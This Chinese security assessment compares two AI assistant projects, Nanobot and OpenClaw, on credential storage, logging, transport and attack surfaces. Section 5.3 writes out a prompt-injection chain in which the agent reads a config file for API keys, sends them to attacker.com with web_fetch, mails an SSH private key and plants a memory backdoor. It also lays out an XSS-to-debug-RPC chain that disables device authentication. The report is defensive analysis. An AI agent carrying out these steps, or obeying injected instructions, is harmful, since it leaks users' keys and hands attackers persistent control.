1. 总体概况

1.1 项目定位

        两个项目均为多通道AI助手,能够接入多个聊天平台(微信、钉钉、Slack、Telegram等),处理用户消息、API密钥、OAuth凭证等敏感数据。它们在架构上有相似之处,但安全成熟度差异明显。

1.2 技术架构对比

核心结论:Nanobot的安全风险显著高于OpenClaw,主要原因是缺乏系统性的安全防护机制。OpenClaw虽然也存在问题,但已建立了相对完善的安全基础设施。

2. 漏洞全景分析

2.1 漏洞分布总览

按严重级别分布:

2.2 漏洞类型对比

3. 共性安全问题:AI助手的通用挑战

以下问题在两个项目中均存在,反映了AI助手类应用的通用安全挑战:

3.1 凭据明文存储

两个项目都将敏感凭据以明文形式存储,只是存储位置不同:

差异分析:OpenClaw提供了SecretRef机制(env:/file:/exec:)作为替代方案,移动端使用了系统级安全存储(iOS Keychain, Android EncryptedSharedPreferences)。Nanobot没有任何替代方案。

3.2 日志中的敏感数据泄露

两个项目都存在日志泄露风险,但严重程度不同:

差异分析:Nanobot在INFO级别(生产默认)记录完整消息内容,风险远高于OpenClaw。OpenClaw的日志泄露主要涉及令牌片段而非用户消息。

3.3 传输安全不足

差异分析:Nanobot的SSL自动禁用是Critical级别问题;OpenClaw在非loopback地址时强制WSS。

3.4 输入验证不足

3.5 访问控制缺陷

4. 各项目独有风险深度解析

4.1 Nanobot独有的高风险问题

这些问题在OpenClaw中不存在或已有防护:

4.2 OpenClaw独有的风险

关键洞察:OpenClaw的独有问题主要集中在浏览器端安全(XSS、localStorage、CORS),这是其Web UI架构带来的特有攻击面。

5. 攻击面与攻击链分析

5.1 外部攻击面对比

Nanobot外部攻击面:
用户消息 → [12个通道适配器]
          [WhatsApp Bridge WS]
          [Gateway端口18790]
          [Docker暴露端口]

OpenClaw外部攻击面:
用户消息 → [30+渠道插件]
          [HTTP Webhook端点]
          [Gateway端口18789]
          [Control UI(Web)]
          [Extension Relay]
          [浏览器扩展]
          [移动端App]

结论:OpenClaw的攻击面更大(更多通道、Web UI、移动端、浏览器扩展),但其安全防护也更全面。

5.2 内部攻击面对比(提示注入成功后)

Nanobot内部攻击面:
提示注入 → [Shell执行(无沙箱)]
          [文件读写(无路径限制)]
          [Web访问(无SSRF防护)]
          [消息发送(可附带任意文件)]
          [MCP工具(无验证)]
          [子代理(完整权限)]
          [记忆写入(无验证)]

OpenClaw内部攻击面:
提示注入 → [工具调用(有审计)]
          [文件读写(有路径检查)]
          [Web访问(有SSRF防护)]
          [消息发送(有限制)]
          [MCP工具(有策略)]
          [记忆系统(有控制)]

核心风险:Nanobot的内部攻击面风险极高,一旦提示注入成功,攻击者几乎可以执行任意操作。OpenClaw有多层纵深防御。

5.3 最危险的攻击链

Nanobot — 提示注入全链路攻击

恶意消息 → 提示注入 → read_file("~/.nanobot/config.json") 
                 → 获取所有API密钥
                 → web_fetch("https://attacker.com/steal?keys=...") 
                 → 密钥外泄
                 → message(media=["~/.ssh/id_rsa"]) 
                 → SSH私钥通过聊天发送
                 → save_memory("下次启动时执行...") 
                 → 持久化后门

影响:系统级完全沦陷,且可持久化

OpenClaw — XSS + Debug组合攻击

XSS漏洞 → localStorage读取 → 获取Gateway Token + 设备私钥
               → 伪造设备身份 → 调用Debug RPC 
               → config.set修改配置
               → 启用dangerouslyDisableDeviceAuth 
               → 持久化访问

影响:Gateway完全控制,但需要先有XSS入口

6. 安全成熟度评分

Logo

AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。

更多推荐